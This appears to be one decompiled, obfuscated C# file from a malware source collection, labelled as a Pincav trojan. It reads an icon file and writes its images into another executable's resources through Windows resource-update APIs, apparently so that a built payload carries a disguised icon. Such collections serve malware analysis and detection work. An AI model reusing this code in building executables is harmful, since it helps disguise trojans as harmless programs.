MalwareSourceCode/MSIL/Trojan/Win32/P/Trojan.Win32.Pincav.cmfl-3fa99ddd788dbbe91390f940f247e68ee6ef463b9a024c2781a0267f9ccc9501/_0006.cs

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Random, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 29923E1C-4A06-46C3-B41C-690DFD9D7396
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pincav.cmfl-3fa99ddd788dbbe91390f940f247e68ee6ef463b9a024c2781a0267f9ccc9501.exe

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Security;

public sealed class \u0006
{
  [DebuggerNonUserCode]
  public \u0006()
  {
  }

  public static void \u0002(string _param0, string _param1) => \u0006.\u0002(_param0, _param1, 1U, 1U);

  public static void \u0002(string _param0, string _param1, uint _param2, uint _param3)
  {
    \u0006.\u000E obj = \u0006.\u000E.\u0002(_param1);
    IntPtr num1 = \u0006.\u0002.\u0002(_param0, false);
    byte[] numArray1 = obj.\u0002(_param3);
    IntPtr num2 = num1;
    IntPtr num3 = new IntPtr(14L);
    IntPtr num4 = num3;
    IntPtr num5 = new IntPtr((long) _param2);
    IntPtr num6 = num5;
    byte[] numArray2 = numArray1;
    int length1 = numArray1.Length;
    \u0006.\u0002.\u0002(num2, num4, num6, (short) 0, numArray2, length1);
    int num7 = checked (obj.\u0002() - 1);
    int num8 = 0;
    while (num8 <= num7)
    {
      byte[] numArray3 = obj.\u0002(num8);
      IntPtr num9 = num1;
      num5 = new IntPtr(3L);
      IntPtr num10 = num5;
      num3 = new IntPtr(checked ((long) _param3 + (long) num8));
      IntPtr num11 = num3;
      byte[] numArray4 = numArray3;
      int length2 = numArray3.Length;
      \u0006.\u0002.\u0002(num9, num10, num11, (short) 0, numArray4, length2);
      checked { ++num8; }
    }
    \u0006.\u0002.\u0002(num1, false);
  }

  [SuppressUnmanagedCodeSecurity]
  private sealed class \u0002
  {
    [DebuggerNonUserCode]
    public \u0002()
    {
    }

    [DllImport("kernel32", EntryPoint = "BeginUpdateResource")]
    public static extern IntPtr \u0002(string _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);

    [DllImport("kernel32", EntryPoint = "UpdateResource")]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool \u0002(
      IntPtr _param0,
      IntPtr _param1,
      IntPtr _param2,
      short _param3,
      [MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 5)] byte[] _param4,
      int _param5);

    [DllImport("kernel32", EntryPoint = "EndUpdateResource")]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool \u0002(IntPtr _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);
  }

  private struct \u0003
  {
    public ushort \u0002;
    public ushort \u0003;
    public ushort \u0005;
  }

  private struct \u0005
  {
    public byte \u0002;
    public byte \u0003;
    public byte \u0005;
    public byte \u0008;
    public ushort \u0006;
    public ushort \u000E;
    public int \u000F;
    public int \u0002\u2000;
  }

  [StructLayout(LayoutKind.Sequential, Pack = 2)]
  private struct \u0006
  {
    public byte \u0002;
    public byte \u0003;
    public byte \u0005;
    public byte \u0008;
    public ushort \u0006;
    public ushort \u000E;
    public int \u000F;
    public ushort \u0002\u2000;
  }

  private struct \u0008
  {
    public uint \u0002;
    public int \u0003;
    public int \u0005;
    public ushort \u0008;
    public ushort \u0006;
    public uint \u000E;
    public uint \u000F;
    public int \u0002\u2000;
    public int \u0003\u2000;
    public uint \u0005\u2000;
    public uint \u0008\u2000;
  }

  private sealed class \u000E
  {
    private \u0006.\u0003 \u0002;
    private \u0006.\u0005[] \u0003;
    private byte[][] \u0005;

    private \u000E() => this.\u0002 = new \u0006.\u0003();

    public int \u0002() => (int) this.\u0002.\u0005;

    public byte[] \u0002(int _param1) => this.\u0005[_param1];

    public static \u0006.\u000E \u0002(string _param0)
    {
      \u0006.\u000E obj = new \u0006.\u000E();
      byte[] src = File.ReadAllBytes(_param0);
      GCHandle gcHandle = GCHandle.Alloc((object) src, GCHandleType.Pinned);
      obj.\u0002 = (\u0006.\u0003) Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), typeof (\u0006.\u0003));
      obj.\u0003 = new \u0006.\u0005[checked ((int) obj.\u0002.\u0005 - 1 + 1)];
      obj.\u0005 = new byte[checked ((int) obj.\u0002.\u0005 - 1 + 1)][];
      int num1 = Marshal.SizeOf((object) obj.\u0002);
      Type type = typeof (\u0006.\u0005);
      int num2 = Marshal.SizeOf(type);
      int num3 = checked ((int) obj.\u0002.\u0005 - 1);
      int index = 0;
      while (index <= num3)
      {
        \u0006.\u0005 structure = (\u0006.\u0005) Marshal.PtrToStructure(new IntPtr(checked (gcHandle.AddrOfPinnedObject().ToInt64() + (long) num1)), type);
        obj.\u0003[index] = structure;
        obj.\u0005[index] = new byte[checked (structure.\u000F - 1 + 1)];
        Buffer.BlockCopy((Array) src, structure.\u0002\u2000, (Array) obj.\u0005[index], 0, structure.\u000F);
        checked { num1 += num2; }
        checked { ++index; }
      }
      gcHandle.Free();
      return obj;
    }

    public byte[] \u0002(uint _param1)
    {
      byte[] numArray = new byte[checked (Marshal.SizeOf(typeof (\u0006.\u0003)) + Marshal.SizeOf(typeof (\u0006.\u0006)) * this.\u0002() - 1 + 1)];
      GCHandle gcHandle1 = GCHandle.Alloc((object) numArray, GCHandleType.Pinned);
      Marshal.StructureToPtr((object) this.\u0002, gcHandle1.AddrOfPinnedObject(), false);
      int num1 = Marshal.SizeOf((object) this.\u0002);
      int num2 = checked (this.\u0002() - 1);
      int index = 0;
      while (index <= num2)
      {
        \u0006.\u0006 structure = new \u0006.\u0006();
        \u0006.\u0008 obj = new \u0006.\u0008();
        GCHandle gcHandle2 = GCHandle.Alloc((object) obj, GCHandleType.Pinned);
        Marshal.Copy(this.\u0002(index), 0, gcHandle2.AddrOfPinnedObject(), Marshal.SizeOf(typeof (\u0006.\u0008)));
        gcHandle2.Free();
        structure.\u0002 = this.\u0003[index].\u0002;
        structure.\u0003 = this.\u0003[index].\u0003;
        structure.\u0005 = this.\u0003[index].\u0005;
        structure.\u0008 = this.\u0003[index].\u0008;
        structure.\u0006 = obj.\u0008;
        structure.\u000E = obj.\u0006;
        structure.\u000F = this.\u0003[index].\u000F;
        structure.\u0002\u2000 = checked ((ushort) ((long) _param1 + (long) index));
        Marshal.StructureToPtr((object) structure, new IntPtr(checked (gcHandle1.AddrOfPinnedObject().ToInt64() + (long) num1)), false);
        checked { num1 += Marshal.SizeOf(typeof (\u0006.\u0006)); }
        checked { ++index; }
      }
      gcHandle1.Free();
      return numArray;
    }
  }
}